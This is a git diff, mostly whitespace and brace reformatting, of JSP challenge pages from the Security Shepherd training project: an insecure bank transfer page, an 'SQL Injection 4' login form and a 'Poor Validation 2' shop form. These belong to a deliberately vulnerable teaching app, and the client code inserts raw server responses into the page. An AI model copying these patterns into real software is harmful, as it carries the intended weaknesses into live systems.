-                    $("#logoutResultsDiv").show("fast");
-                    $("#logoutFormDiv").slideDown("slow");
-                }
-            });
-        });
-        console.log("Logout Function Complete");
-    }
-</script>
-<% if (Analytics.googleAnalyticsOn) { %><%= Analytics.googleAnalyticsScript %>
-<% } %>
+	<script type="text/javascript" src="../js/jquery.js"></script>
+	<script type="text/javascript"
+		src="../js/clipboard-js/clipboard.min.js"></script>
+	<script type="text/javascript" src="../js/clipboard-js/tooltips.js"></script>
+	<script type="text/javascript"
+		src="../js/clipboard-js/clipboard-events.js"></script>
+	<div id="contentDiv">
+		<h2 class="title"><%= levelName %></h2>
+		<p>
+			<%= bundle.getString("challenge.whatToDo") %>
+			<br /> <br />
+		<h1 class='title'><%= bundle.getString("insecureBank.title") %></h1>
+		<p><%= bundle.getString("insecureBank.message") %></p>
+		<div id="unauthDiv" <% if(bankSessionDetected){ %>
+			style="display: none;" <% } %>>
+			<h2 class="title"><%= bundle.getString("insecureBank.signInNow") %></h2>
+			<p><%= bundle.getString("insecureBank.signInNow.message") %></p>
+			<div id="loginFormDiv">
+				<form id="loginForm" action="javascript:;">
+					<table>
+						<tr>
+							<td><%= bundle.getString("loginForm.holder") %></td>
+							<td><input type="text" id="loginAccountHolder"
+								autocomplete="off"></td>
+						</tr>
+						<tr>
+							<td><%= bundle.getString("loginForm.password") %></td>
+							<td><input type="password" id="loginAccountPassword"
+								autocomplete="off"></td>
+						</tr>
+						<tr>
+							<td colspan="2"><input type="submit"
+								value="<%= bundle.getString("loginForm.signIn") %>"></td>
+						</tr>
+					</table>
+				</form>
+			</div>
+			<p style="display: none;" id="loginLoadingSign"><%= bundle.getString("form.loading") %></p>
+			<div id="loginResultsDiv"></div>
+			<br> <br>
+			<h2 class="title"><%= bundle.getString("register.makeAccount") %></h2>
+			<p><%= bundle.getString("register.makeAccount.message") %></p>
+			<div id="registrationFormDiv">
+				<form id="registrationForm" action="javascript:;">
+					<table>
+						<tr>
+							<td><%= bundle.getString("loginForm.holder") %></td>
+							<td><input type="text" id="registrationAccountHolder"
+								autocomplete="off"></td>
+						</tr>
+						<tr>
+							<td><%= bundle.getString("loginForm.password") %></td>
+							<td><input type="password" id="registrationAccountPassword"
+								autocomplete="off"></td>
+						</tr>
+						<tr>
+							<td colspan="2"><input type="submit"
+								value="<%= bundle.getString("register.createAccount") %>"></td>
+						</tr>
+					</table>
+				</form>
+			</div>
+			<p style="display: none;" id="registrationLoadingSign"><%= bundle.getString("form.loading") %></p>
+			<div id="registrationResultsDiv"></div>
+		</div>
+		<div id="authenticatedDiv" <% if(!bankSessionDetected){ %>
+			style="display: none;" <% } %>>
+			<% if(bankSessionDetected){ %>
+			<%= DirectObjectBankLogin.bankForm(currentBankAccountNumber, getServletContext().getRealPath(""), ses) %>
+			<% } %>
+		</div>
+		</p>
+	</div>
+	<script>
+			$("#loginForm").submit(function(){
+				var theAccountHolder = $("#loginAccountHolder").val();
+				var theAccountPass = $("#loginAccountPassword").val();
+				$("#loginResultsDiv").hide("fast");
+				$("#loginLoadingSign").show("slow");
+				$("#loginFormDiv").slideUp("fast", function(){
+					var ajaxCall = $.ajax({
+						type: "POST",
+						url: "<%= levelHash %>",
+						data: {
+							accountHolder: theAccountHolder, 
+							accountPass: theAccountPass
+						},
+						async: false
+					});
+					$("#loginLoadingSign").hide("fast", function(){
+						if(ajaxCall.status == 200 && !ajaxCall.responseText.startsWith("ERROR"))
+						{
+							$("#authenticatedDiv").html(ajaxCall.responseText);
+							$("#unauthDiv").slideUp("fast");
+							$("#authenticatedDiv").slideDown("slow");
+						}
+						else
+						{
+							if(ajaxCall.responseText.startsWith("ERROR"))
+								$("#loginResultsDiv").html(ajaxCall.responseText);
+							else
+								$("#loginResultsDiv").html("<p> <%= bundle.getString("error.occurred") %>: " + ajaxCall.status + " " + ajaxCall.statusText + "</p>");
+							$("#loginResultsDiv").show("fast");
+							$("#loginFormDiv").slideDown("slow");
+						}
+					});
+				});
+			});
+			
+			$("#registrationForm").submit(function(){
+				var theAccountHolder = $("#registrationAccountHolder").val();
+				var theAccountPass = $("#registrationAccountPassword").val();
+				$("#registrationResultsDiv").hide("fast");
+				$("#registrationLoadingSign").show("slow");
+				$("#registrationFormDiv").slideUp("fast", function(){
+					var ajaxCall = $.ajax({
+						type: "POST",
+						url: "<%= levelHash %>Reg",
+						data: {
+							accountHolder: theAccountHolder, 
+							accountPass: theAccountPass
+						},
+						async: false
+					});
+					$("#registrationLoadingSign").hide("fast", function(){
+						if(ajaxCall.status == 200 && !ajaxCall.responseText.startsWith("ERROR"))
+						{
+							$("#registrationResultsDiv").html(ajaxCall.responseText);
+						}
+						else
+						{
+							$("#registrationResultsDiv").html("<p> <%= bundle.getString("error.occurred") %>: " + ajaxCall.status + " " + ajaxCall.statusText + ".</p>");
+						}
+						$("#registrationResultsDiv").show("fast");
+						$("#registrationFormDiv").slideDown("slow");
+					});
+				});
+			});
+			
+			function refreshFunds(){
+				console.log("Updating Balance");
+				var theAccountNumber = $("#currentAccountNumber").val();
+				console.log("The Account Number: " + theAccountNumber);
+				$("#refreshLoadingSign").show("slow");
+				$("#refreshFormDiv").slideUp("fast", function(){
+					console.log("Sending Ajax Request");
+					var ajaxCall = $.ajax({
+						type: "POST",
+						url: "<%= levelHash %>CurrentBalance",
+						data: {
+							accountNumber: theAccountNumber
+						},
+						async: false
+					});
+					$("#refreshLoadingSign").hide("fast", function(){
+						if(ajaxCall.status == 200 && !ajaxCall.responseText.startsWith("ERROR"))
+						{
+							console.log("Updating Balance...");
+							//Relist Current mode
+							$("#currentAccountBalanceDiv").fadeOut("slow", function(){
+								$("#currentAccountBalanceDiv").text(ajaxCall.responseText);
+							});
+							$("#currentAccountBalanceDiv").fadeIn("slow");
+						}
+						else
+						{
+							console.log("Error Detected");
+							if(ajaxCall.responseText.startsWith("ERROR"))
+								$("#refreshResultsDiv").html("ajaxCall.responseText");
+							else
+								$("#refreshResultsDiv").html("<p> <%= bundle.getString("error.occurred") %>: " + ajaxCall.status + " " + ajaxCall.statusText + "</p>");
+						}
+						$("#refreshResultsDiv").show("fast");
+						$("#refreshFormDiv").slideDown("slow");
+					});
+				});
+				console.log("Finished!");
+			}
+			
+			function transferFunds(){
+				console.log("Transfering Funds");
+				var theRecieverNumber = $("#recieverAccountNumber").val();
+				console.log("theRecieverNumber: " + theRecieverNumber);
+				var theSenderNumber = $("#currentAccountNumber").val();
+				console.log("theSenderNumber: " + theSenderNumber);
+				var theTransferAmount = $("#transferAmount").val();
+				console.log("theTransferAmount: " + theTransferAmount);
+				console.log("Got Data from Form");
+				console.log("Hiding results div");
+				$("#transferResultsDiv").hide("fast");
+				console.log("Showing Loading Div");
+				$("#transferLoadingDiv").show("slow");
+				console.log("Hiding transferFundsForm");
+				$("#transferFundsForm").slideUp("fast", function(){
+					console.log("Sending Ajax Request");
+					var ajaxCall = $.ajax({
+						type: "POST",
+						url: "<%= levelHash %>Transfer",
+						data: {
+							senderAccountNumber: theSenderNumber, 
+							recieverAccountNumber: theRecieverNumber,
+							transferAmount: theTransferAmount
+						},
+						async: false
+					});
+					$("#transferLoadingDiv").hide("fast", function(){
+						console.log("Putting Response Info In DOM");
+						if(ajaxCall.status == 200)
+						{
+							$("#transferResultsDiv").html(ajaxCall.responseText);
+						}
+						else
+						{
+							$("#transferResultsDiv").html("<p> <%= bundle.getString("error.occurred") %>: " + ajaxCall.status + " " + ajaxCall.statusText + "</p>");
+						}
+						$("#transferResultsDiv").show("fast");
+						$("#transferFundsForm").slideDown("slow");
+					});
+				});
+				console.log("Done!");
+			}
+			
+			function logout(){
+				console.log("Signing Out");
+				console.log("Hiding Results Div");
+				$("#logoutResultsDiv").hide("fast");
+				console.log("Showing Loading Div");
+				$("#logoutLoadingSign").show("slow");
+				console.log("Hiding Logout Form Div");
+				$("#logoutFormDiv").slideUp("fast", function(){
+					console.log("Sending Ajax Request");
+					var ajaxCall = $.ajax({
+						type: "POST",
+						url: "<%= levelHash %>Logout",
+						async: false
+					});
+					console.log("Ajax Send, Hiding Loading Div");
+					$("#logoutLoadingSign").hide("fast", function(){
+						console.log("Checking Ajax Response");
+						if(ajaxCall.status == 200 && !ajaxCall.responseText.startsWith("ERROR"))
+						{
+							console.log("Hiding Authenticated Div and showing Login Div");
+							$("#authenticatedDiv").slideUp("fast");
+							$("#authenticatedDiv").html("");
+							$("#unauthDiv").slideDown("slow");
+							$("#loginAccountHolder").val("");
+							$("#loginAccountPassword").val("");
+							$("#loginFormDiv").show("slow");
+							$('html, body').animate({
+						        scrollTop: $("#loginFormDiv").offset().top
+						    }, 1000);
+						}
+						else
+						{
+							console.log("Something Went Wrong: " + ajaxCall.responseText);
+							if(ajaxCall.responseText.startsWith("ERROR"))
+								$("#logoutResultsDiv").html(ajaxCall.responseText);
+							else
+								$("#logoutResultsDiv").html("<p> <%= bundle.getString("error.occurred") %>: " + ajaxCall.status + " " + ajaxCall.statusText + "</p>");
+							$("#logoutResultsDiv").show("fast");
+							$("#logoutFormDiv").slideDown("slow");
+						}
+					});
+				});
+				console.log("Logout Function Complete");
+			}
+		</script>
+	<% if(Analytics.googleAnalyticsOn) { %><%= Analytics.googleAnalyticsScript %>
+	<% } %>
 </body>
 </html>
 <%
-        } else {
-            response.sendRedirect("../loggedOutSheep.html");
-        }
-    } else {
-        response.sendRedirect("../loggedOutSheep.html");
-    }
+	}
+	else
+	{
+		response.sendRedirect("../loggedOutSheep.html");
+	}
+}
+else
+{
+	response.sendRedirect("../loggedOutSheep.html");
+}
 %>
\ No newline at end of file
diff --git a/src/main/webapp/challenges/1feccf2205b4c5ddf743630b46aece3784d61adc56498f7603ccd7cb8ae92629.jsp b/src/main/webapp/challenges/1feccf2205b4c5ddf743630b46aece3784d61adc56498f7603ccd7cb8ae92629.jsp
index 1bc5e88fa..41f737e64 100644
--- a/src/main/webapp/challenges/1feccf2205b4c5ddf743630b46aece3784d61adc56498f7603ccd7cb8ae92629.jsp
+++ b/src/main/webapp/challenges/1feccf2205b4c5ddf743630b46aece3784d61adc56498f7603ccd7cb8ae92629.jsp
@@ -1,148 +1,155 @@
 <%@ page contentType="text/html; charset=UTF-8" pageEncoding="UTF-8"
-         language="java" import="utils.*" errorPage="" %>
-<%@ page import="java.util.Locale, java.util.ResourceBundle" %>
+	language="java" import="utils.*" errorPage=""%>
+<%@ page import="java.util.Locale, java.util.ResourceBundle"%>
 <%
-    /**
-     * <br/><br/>
-     * This file is part of the Security Shepherd Project.
-     *
-     * The Security Shepherd project is free software: you can redistribute it and/or modify
-     * it under the terms of the GNU General Public License as published by
-     * the Free Software Foundation, either version 3 of the License, or
-     * (at your option) any later version.<br/>
-     *
-     * The Security Shepherd project is distributed in the hope that it will be useful,
-     * but WITHOUT ANY WARRANTY; without even the implied warranty of
-     * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
-     * GNU General Public License for more details.<br/>
-     *
-     * You should have received a copy of the GNU General Public License
-     * along with the Security Shepherd project.  If not, see <http://www.gnu.org/licenses/>.
-     *
-     * @author Mark Denihan
-     */
-
+/**
+ * <br/><br/>
+ * This file is part of the Security Shepherd Project.
+ * 
+ * The Security Shepherd project is free software: you can redistribute it and/or modify
+ * it under the terms of the GNU General Public License as published by
+ * the Free Software Foundation, either version 3 of the License, or
+ * (at your option) any later version.<br/>
+ * 
+ * The Security Shepherd project is distributed in the hope that it will be useful,
+ * but WITHOUT ANY WARRANTY; without even the implied warranty of
+ * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
+ * GNU General Public License for more details.<br/>
+ * 
+ * You should have received a copy of the GNU General Public License
+ * along with the Security Shepherd project.  If not, see <http://www.gnu.org/licenses/>. 
+ *
+ * @author Mark Denihan
+ */
+ 
 //No Quotes In level Name
-    String levelName = "SQL Injection 4";
+String levelName = "SQL Injection 4";
 //Alphanumeric Only
-    String levelHash = "1feccf2205b4c5ddf743630b46aece3784d61adc56498f7603ccd7cb8ae92629";
+String levelHash = "1feccf2205b4c5ddf743630b46aece3784d61adc56498f7603ccd7cb8ae92629";
 
 //Translation Stuff
-    Locale locale = new Locale(Validate.validateLanguage(request.getSession()));
-    ResourceBundle bundle = ResourceBundle.getBundle("i18n.challenges.injection." + levelHash, locale);
+Locale locale = new Locale(Validate.validateLanguage(request.getSession()));
+ResourceBundle bundle = ResourceBundle.getBundle("i18n.challenges.injection." + levelHash, locale);
 //Used more than once translations
-    String i18nLevelName = bundle.getString("challenge.challengeName");
-    ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), levelName + " Accessed");
-    if (request.getSession() != null) {
-        HttpSession ses = request.getSession();
-        //Getting CSRF Token from client
-        Cookie tokenCookie = null;
-        try {
-            tokenCookie = Validate.getToken(request.getCookies());
-        } catch (Exception htmlE) {
-            ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), levelName + ".jsp: tokenCookie Error:" + htmlE.toString());
-        }
-        // validateSession ensures a valid session, and valid role credentials
-        // If tokenCookie == null, then the page is not going to continue loading
-        if (Validate.validateSession(ses) && tokenCookie != null) {
-            ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), levelName + " has been accessed by " + ses.getAttribute("userName").toString(), ses.getAttribute("userName"));
+String i18nLevelName = bundle.getString("challenge.challengeName");
+ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), levelName + " Accessed");
+if (request.getSession() != null)
+{
+	HttpSession ses = request.getSession();
+	//Getting CSRF Token from client
+	Cookie tokenCookie = null;
+	try
+	{
+		tokenCookie = Validate.getToken(request.getCookies());
+	}
+	catch(Exception htmlE)
+	{
+		ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), levelName +".jsp: tokenCookie Error:" + htmlE.toString());
+	}
+	// validateSession ensures a valid session, and valid role credentials
+	// If tokenCookie == null, then the page is not going to continue loading
+	if (Validate.validateSession(ses) && tokenCookie != null)
+	{
+		ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), levelName + " has been accessed by " + ses.getAttribute("userName").toString(), ses.getAttribute("userName"));
 %>
 <html xmlns="http://www.w3.org/1999/xhtml">
 <head>
-    <meta http-equiv="content-type" content="text/html; charset=utf-8"/>
-    <title>Security Shepherd - <%= i18nLevelName %>
-    </title>
-    <link href="../css/lessonCss/theCss.css" rel="stylesheet"
-          type="text/css" media="screen"/>
+<meta http-equiv="content-type" content="text/html; charset=utf-8" />
+<title>Security Shepherd - <%= i18nLevelName %></title>
+<link href="../css/lessonCss/theCss.css" rel="stylesheet"
+	type="text/css" media="screen" />
 
 </head>
 <body>
-<script type="text/javascript" src="../js/jquery.js"></script>
-<script type="text/javascript"
-        src="../js/clipboard-js/clipboard.min.js"></script>
-<script type="text/javascript" src="../js/clipboard-js/tooltips.js"></script>
-<script type="text/javascript"
-        src="../js/clipboard-js/clipboard-events.js"></script>
-<div id="contentDiv">
-    <h2 class="title"><%= i18nLevelName %>
-    </h2>
-    <p>
-            <%= bundle.getString("challenge.description") %>
-        <br/> <br/>
-    <h2 class="title"><%= bundle.getString("challenge.superSecurePayments") %>
-    </h2>
-    <form id="leForm" action="javascript:;" autocomplete="off">
-        <table>
-            <tr>
-                <td colspan="2"><%= bundle.getString("challenge.form.instruction") %>
-                </td>
-            </tr>
-            <tr>
-                <td><%= bundle.getString("challenge.form.userName") %>
-                </td>
-                <td><input style="width: 200px;" id="theUserName" type="text"
-                           autocomplete="off"/></td>
-            </tr>
-            <tr>
-                <td><%= bundle.getString("challenge.form.password") %>
-                </td>
-                <td><input style="width: 200px;" id="thePassword"
-                           type="password" autocomplete="off"/></td>
-            </tr>
-            <tr>
-                <td colspan="2">
-                    <div id="submitButton">
-                        <input type="submit" value="Get user"/>
-                    </div>
-                    <p style="display: none;" id="loadingSign"><%= bundle.getString("sign.loading") %>...
-                    </p>
-                </td>
-            </tr>
-        </table>
-    </form>
+	<script type="text/javascript" src="../js/jquery.js"></script>
+	<script type="text/javascript"
+		src="../js/clipboard-js/clipboard.min.js"></script>
+	<script type="text/javascript" src="../js/clipboard-js/tooltips.js"></script>
+	<script type="text/javascript"
+		src="../js/clipboard-js/clipboard-events.js"></script>
+	<div id="contentDiv">
+		<h2 class="title"><%= i18nLevelName %></h2>
+		<p>
+			<%= bundle.getString("challenge.description") %>
+			<br /> <br />
+		<h2 class="title"><%= bundle.getString("challenge.superSecurePayments") %></h2>
+		<form id="leForm" action="javascript:;" autocomplete="off">
+			<table>
+				<tr>
+					<td colspan="2"><%= bundle.getString("challenge.form.instruction") %>
+					</td>
+				</tr>
+				<tr>
+					<td><%= bundle.getString("challenge.form.userName") %></td>
+					<td><input style="width: 200px;" id="theUserName" type="text"
+						autocomplete="off" /></td>
+				</tr>
+				<tr>
+					<td><%= bundle.getString("challenge.form.password") %></td>
+					<td><input style="width: 200px;" id="thePassword"
+						type="password" autocomplete="off" /></td>
+				</tr>
+				<tr>
+					<td colspan="2">
+						<div id="submitButton">
+							<input type="submit" value="Get user" />
+						</div>
+						<p style="display: none;" id="loadingSign"><%= bundle.getString("sign.loading") %>...
+						</p>
+					</td>
+				</tr>
+			</table>
+		</form>
 
-    <div id="resultsDiv"></div>
-    </p>
-</div>
+		<div id="resultsDiv"></div>
+		</p>
+	</div>
 
-<script>
-    $("#leForm").submit(function () {
-        var userName = $("#theUserName").val();
-        var password = $("#thePassword").val();
-        $("#submitButton").hide("fast");
-        $("#loadingSign").show("slow");
-        $("#resultsDiv").hide("slow", function () {
-            var ajaxCall = $.ajax({
-                type: "POST",
-                url: "<%= levelHash %>",
-                data: {
-                    theUserName: userName,
-                    thePassword: password
-                },
-                async: false
-            });
-            if (ajaxCall.status == 200) {
-                $("#resultsDiv").html(ajaxCall.responseText);
-            } else {
-                $("#resultsDiv").html("<p> <%= bundle.getString("error.occurred") %>: " + ajaxCall.status + " " + ajaxCall.statusText + "</p>");
-            }
-            $("#resultsDiv").show("slow", function () {
-                $("#loadingSign").hide("fast", function () {
-                    $("#submitButton").show("slow");
-                });
-            });
-        });
-    });
-</script>
-<% if (Analytics.googleAnalyticsOn) { %><%= Analytics.googleAnalyticsScript %>
-<% } %>
+	<script>
+			$("#leForm").submit(function(){
+				var userName = $("#theUserName").val();
+				var password = $("#thePassword").val();
+				$("#submitButton").hide("fast");
+				$("#loadingSign").show("slow");
+				$("#resultsDiv").hide("slow", function(){
+					var ajaxCall = $.ajax({
+						type: "POST",
+						url: "<%= levelHash %>",
+						data: {
+							theUserName: userName, 
+							thePassword: password
+						},
+						async: false
+					});
+					if(ajaxCall.status == 200)
+					{
+						$("#resultsDiv").html(ajaxCall.responseText);
+					}
+					else
+					{
+						$("#resultsDiv").html("<p> <%= bundle.getString("error.occurred") %>: " + ajaxCall.status + " " + ajaxCall.statusText + "</p>");
+					}
+					$("#resultsDiv").show("slow", function(){
+						$("#loadingSign").hide("fast", function(){
+							$("#submitButton").show("slow");
+						});
+					});
+				});
+			});
+		</script>
+	<% if(Analytics.googleAnalyticsOn) { %><%= Analytics.googleAnalyticsScript %>
+	<% } %>
 </body>
 </html>
-<%
-        } else {
-            response.sendRedirect("../loggedOutSheep.html");
-        }
-    } else {
-        response.sendRedirect("../loggedOutSheep.html");
-    }
+<% 
+	}
+	else
+	{
+		response.sendRedirect("../loggedOutSheep.html");
+	}
+}
+else
+{
+	response.sendRedirect("../loggedOutSheep.html");
+}
 %>
\ No newline at end of file
diff --git a/src/main/webapp/challenges/20e8c4bb50180fed9c1c8d1bf6af5eac154e97d3ce97e43257c76e73e3bbe5d5.jsp b/src/main/webapp/challenges/20e8c4bb50180fed9c1c8d1bf6af5eac154e97d3ce97e43257c76e73e3bbe5d5.jsp
index 406edd93f..67402cf61 100644
--- a/src/main/webapp/challenges/20e8c4bb50180fed9c1c8d1bf6af5eac154e97d3ce97e43257c76e73e3bbe5d5.jsp
+++ b/src/main/webapp/challenges/20e8c4bb50180fed9c1c8d1bf6af5eac154e97d3ce97e43257c76e73e3bbe5d5.jsp
@@ -1,195 +1,189 @@
 <%@ page contentType="text/html; charset=UTF-8" pageEncoding="UTF-8"
-         language="java" import="utils.*" errorPage="" %>
-<%@ page import="java.util.Locale, java.util.ResourceBundle" %>
+	language="java" import="utils.*" errorPage=""%>
+<%@ page import="java.util.Locale, java.util.ResourceBundle"%>
 <%
-    /**
-     * <br/><br/>
-     * This file is part of the Security Shepherd Project.
-     *
-     * The Security Shepherd project is free software: you can redistribute it and/or modify
-     * it under the terms of the GNU General Public License as published by
-     * the Free Software Foundation, either version 3 of the License, or
-     * (at your option) any later version.<br/>
-     *
-     * The Security Shepherd project is distributed in the hope that it will be useful,
-     * but WITHOUT ANY WARRANTY; without even the implied warranty of
-     * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
-     * GNU General Public License for more details.<br/>
-     *
-     * You should have received a copy of the GNU General Public License
-     * along with the Security Shepherd project.  If not, see <http://www.gnu.org/licenses/>.
-     *
-     * @author Mark Denihan
-     */
-    //No Quotes In level Name
-    String levelName = "Poor Validation 2";
-    //Alphanumeric Only
-    String levelHash = "20e8c4bb50180fed9c1c8d1bf6af5eac154e97d3ce97e43257c76e73e3bbe5d5";
+	/**
+	 * <br/><br/>
+	 * This file is part of the Security Shepherd Project.
+	 * 
+	 * The Security Shepherd project is free software: you can redistribute it and/or modify
+	 * it under the terms of the GNU General Public License as published by
+	 * the Free Software Foundation, either version 3 of the License, or
+	 * (at your option) any later version.<br/>
+	 * 
+	 * The Security Shepherd project is distributed in the hope that it will be useful,
+	 * but WITHOUT ANY WARRANTY; without even the implied warranty of
+	 * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
+	 * GNU General Public License for more details.<br/>
+	 * 
+	 * You should have received a copy of the GNU General Public License
+	 * along with the Security Shepherd project.  If not, see <http://www.gnu.org/licenses/>. 
+	 *
+	 * @author Mark Denihan
+	 */
+	//No Quotes In level Name
+	String levelName = "Poor Validation 2";
+	//Alphanumeric Only
+	String levelHash = "20e8c4bb50180fed9c1c8d1bf6af5eac154e97d3ce97e43257c76e73e3bbe5d5";
 
-    //Translation Stuff
-    Locale locale = new Locale(Validate.validateLanguage(request.getSession()));
-    ResourceBundle bundle = ResourceBundle.getBundle("i18n.challenges.poorValidation.poorValidationStrings",
-            locale);
-    //Used more than once translations
-    String i18nLevelName = bundle.getString("poorValidation.2.challengeName");
+	//Translation Stuff
+	Locale locale = new Locale(Validate.validateLanguage(request.getSession()));
+	ResourceBundle bundle = ResourceBundle.getBundle("i18n.challenges.poorValidation.poorValidationStrings",
+			locale);
+	//Used more than once translations
+	String i18nLevelName = bundle.getString("poorValidation.2.challengeName");
 
-    ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"),
-            levelName + " Accessed");
-    if (request.getSession() != null) {
-        HttpSession ses = request.getSession();
-        //Getting CSRF Token from client
-        Cookie tokenCookie = null;
-        try {
-            tokenCookie = Validate.getToken(request.getCookies());
-        } catch (Exception htmlE) {
-            ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"),
-                    levelName + ".jsp: tokenCookie Error:" + htmlE.toString());
-        }
-        // validateSession ensures a valid session, and valid role credentials
-        // If tokenCookie == null, then the page is not going to continue loading
-        if (Validate.validateSession(ses) && tokenCookie != null) {
-            ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"),
-                    levelName + " has been accessed by " + ses.getAttribute("userName").toString(),
-                    ses.getAttribute("userName"));
+	ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"),
+			levelName + " Accessed");
+	if (request.getSession() != null) {
+		HttpSession ses = request.getSession();
+		//Getting CSRF Token from client
+		Cookie tokenCookie = null;
+		try {
+			tokenCookie = Validate.getToken(request.getCookies());
+		} catch (Exception htmlE) {
+			ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"),
+					levelName + ".jsp: tokenCookie Error:" + htmlE.toString());
+		}
+		// validateSession ensures a valid session, and valid role credentials
+		// If tokenCookie == null, then the page is not going to continue loading
+		if (Validate.validateSession(ses) && tokenCookie != null) {
+			ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"),
+					levelName + " has been accessed by " + ses.getAttribute("userName").toString(),
+					ses.getAttribute("userName"));
 %>
 <html xmlns="http://www.w3.org/1999/xhtml">
 <head>
-    <meta http-equiv="content-type" content="text/html; charset=utf-8"/>
-    <title>Security Shepherd - <%=i18nLevelName%>
-    </title>
-    <link href="../css/lessonCss/theCss.css" rel="stylesheet"
-          type="text/css" media="screen"/>
+<meta http-equiv="content-type" content="text/html; charset=utf-8" />
+<title>Security Shepherd - <%=i18nLevelName%></title>
+<link href="../css/lessonCss/theCss.css" rel="stylesheet"
+	type="text/css" media="screen" />
 
 </head>
 <body>
-<script type="text/javascript" src="../js/jquery.js"></script>
-<script type="text/javascript"
-        src="../js/clipboard-js/clipboard.min.js"></script>
-<script type="text/javascript" src="../js/clipboard-js/tooltips.js"></script>
-<script type="text/javascript"
-        src="../js/clipboard-js/clipboard-events.js"></script>
-<div id="contentDiv">
-    <h2 class="title"><%=i18nLevelName%>
-    </h2>
-    <p>
-            <%=bundle.getString("poorValidation.whatToDo")%>
-        <br/> <br/>
-    <h3 class="title"><%=bundle.getString("poorValidation.shopping")%>
-    </h3>
-    <p><%=bundle.getString("poorValidation.shopping.whatToDo")%>
-    </p>
-    <br/> <br/>
-    <form id="leForm" action="javascript:;">
-        <table>
-            <!-- Header -->
-            <tr>
-                <th><%=bundle.getString("poorValidation.picture")%>
-                </th>
-                <th><%=bundle.getString("poorValidation.cost")%>
-                </th>
-                <th><%=bundle.getString("poorValidation.quantity")%>
-                </th>
-            </tr>
-            <!-- Apple Row -->
-            <tr>
-                <td><img width="50px" height="50px"
-                         src="<%=levelHash%>/apple.jpg"/></td>
-                <td>$45</td>
-                <td><input type="text" style="width: 50px" value="0"
-                           id="numberOfApples" autocomplete="off"/>
-            </tr>
-            <!-- Banana Row -->
-            <tr>
-                <td><img width="50px" height="50px"
-                         src="<%=levelHash%>/banana.jpg"/></td>
-                <td>$15</td>
-                <td><input type="text" style="width: 50px" value="0"
-                           id="numberOfBananas" autocomplete="off"/>
-            </tr>
-            <!-- Orange Row -->
-            <tr>
-                <td><img width="50px" height="50px"
-                         src="<%=levelHash%>/orange.jpg"/></td>
-                <td>$3000</td>
-                <td><input type="text" style="width: 50px" value="0"
-                           id="numberOfOranges" autocomplete="off"/>
-            </tr>
-            <!-- Pineapple Row -->
-            <tr>
-                <td><img width="50px" height="50px"
-                         src="<%=levelHash%>/pineapple.png"/></td>
-                <td>$30</td>
-                <td><input type="text" style="width: 50px" value="0"
-                           id="numberOfPineapples" autocomplete="off"/>
-            </tr>
-        </table>
+	<script type="text/javascript" src="../js/jquery.js"></script>
+	<script type="text/javascript"
+		src="../js/clipboard-js/clipboard.min.js"></script>
+	<script type="text/javascript" src="../js/clipboard-js/tooltips.js"></script>
+	<script type="text/javascript"
+		src="../js/clipboard-js/clipboard-events.js"></script>
+	<div id="contentDiv">
+		<h2 class="title"><%=i18nLevelName%></h2>
+		<p>
+			<%=bundle.getString("poorValidation.whatToDo")%>
+			<br /> <br />
+		<h3 class="title"><%=bundle.getString("poorValidation.shopping")%></h3>
+		<p><%=bundle.getString("poorValidation.shopping.whatToDo")%></p>
+		<br /> <br />
+		<form id="leForm" action="javascript:;">
+			<table>
+				<!-- Header -->
+				<tr>
+					<th><%=bundle.getString("poorValidation.picture")%></th>
+					<th><%=bundle.getString("poorValidation.cost")%></th>
+					<th><%=bundle.getString("poorValidation.quantity")%></th>
+				</tr>
+				<!-- Apple Row -->
+				<tr>
+					<td><img width="50px" height="50px"
+						src="<%=levelHash%>/apple.jpg" /></td>
+					<td>$45</td>
+					<td><input type="text" style="width: 50px" value="0"
+						id="numberOfApples" autocomplete="off" />
+				</tr>
+				<!-- Banana Row -->
+				<tr>
+					<td><img width="50px" height="50px"
+						src="<%=levelHash%>/banana.jpg" /></td>
+					<td>$15</td>
+					<td><input type="text" style="width: 50px" value="0"
+						id="numberOfBananas" autocomplete="off" />
+				</tr>
+				<!-- Orange Row -->
+				<tr>
+					<td><img width="50px" height="50px"
+						src="<%=levelHash%>/orange.jpg" /></td>
+					<td>$3000</td>
+					<td><input type="text" style="width: 50px" value="0"
+						id="numberOfOranges" autocomplete="off" />
+				</tr>
+				<!-- Pineapple Row -->
+				<tr>
+					<td><img width="50px" height="50px"
+						src="<%=levelHash%>/pineapple.png" /></td>
+					<td>$30</td>
+					<td><input type="text" style="width: 50px" value="0"
+						id="numberOfPineapples" autocomplete="off" />
+				</tr>
+			</table>
 
-        <p><%=bundle.getString("poorValidation.howToShop")%>
-        </p>
-        <table>
-            <tr>
-                <td>
-                    <div id="submitButton">
-                        <input type="submit"
-                               value="<%=bundle.getString("poorValidation.placeOrder")%>"/>
-                    </div>
-                    <p style="display: none;" id="loadingSign"><%=bundle.getString("poorValidation.loading")%>
-                    </p>
-                </td>
-            </tr>
-        </table>
-    </form>
+			<p><%=bundle.getString("poorValidation.howToShop")%></p>
+			<table>
+				<tr>
+					<td>
+						<div id="submitButton">
+							<input type="submit"
+								value="<%=bundle.getString("poorValidation.placeOrder")%>" />
+						</div>
+						<p style="display: none;" id="loadingSign"><%=bundle.getString("poorValidation.loading")%></p>
+					</td>
+				</tr>
+			</table>
+		</form>
 
-    <div id="resultsDiv"></div>
-    </p>
-</div>
-<script>
-    $("#leForm").submit(function () {
